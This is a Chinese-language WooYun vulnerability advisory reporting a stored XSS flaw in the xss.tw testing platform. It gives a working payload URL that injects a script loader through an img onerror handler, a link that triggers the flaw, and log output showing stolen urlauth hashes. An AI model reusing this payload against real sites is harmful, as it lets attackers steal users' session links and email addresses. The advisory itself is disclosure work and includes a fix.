当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-018043

漏洞标题:xss.tw 又一个存储型xss 可偷取 别人的urlauth信息

相关厂商:xss.tw

漏洞作者: c4rp3nt3r

提交时间:2013-01-29 11:57

修复时间:2013-01-29 11:57

公开时间:2013-01-29 11:57

漏洞类型:xss跨站脚本攻击

危害等级:低

自评Rank:2

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-01-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-01-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

xss.tw 又一个存储型xss 可偷取 别人的urlauth信息.
话说 xss.tw 太慢了,就自己测试了下自己,就不测试别人了.

详细说明:

提交:

http://xss.tw/1293/?keepsession=&location=http%3A//xss.tw/Project/TestCode/pid/1293&toplocation=http%3A//xss.tw/Project/TestCode/pid/1293&cookie=<img style='display: none' src=cc id=script onerror='var e=document.createElement(this.id);e.src=top.location.href.substring(0,14)%2B1340;document.body.appendChild(e);'>PHPSESSID%3Dpsl0ji26uqeb70fr19f3mkg8r3&opener=http%3A//xss.tw/Project/ViewCode/pid/1293&title=Xss代码测试运行


完了访问 触发漏洞...
http://xss.tw/Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3
发给别人的话能够 盗取 别人urlauth 的地址,以及别人的邮箱...
钓鱼就算了,估计玩这个的安全意识挺高的...
新玩这个,有错请指出...

漏洞证明:

xss.tw.png


[tehran]$ cat xss.tw_result.txt 
============================
Time: 2013-01-29 11:48:27 ip: 看不到我看不到我 HTTP_USER_AGENT: Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 HTTP_REFERER:http://xss.tw/Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3 Pid:pid:1340 e57d44326d0d看不到我看不到我2a75238
============================
Time: 2013-01-29 11:48:27 ip: 看不到我看不到我 HTTP_USER_AGENT: Mozilla/5.0 (X11; Linux i686; rv:16.0) Gecko/20100101 Firefox/16.0 HTTP_REFERER:http://xss.tw/Result/Auth/hash/8f0d2fd263093432694bc5397bbd19e3 Pid:pid:1293 8f0d2fd263093432694bc5397bbd19e3


修复方案:

htmlspecialchars();

版权声明:转载请注明来源 c4rp3nt3r@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝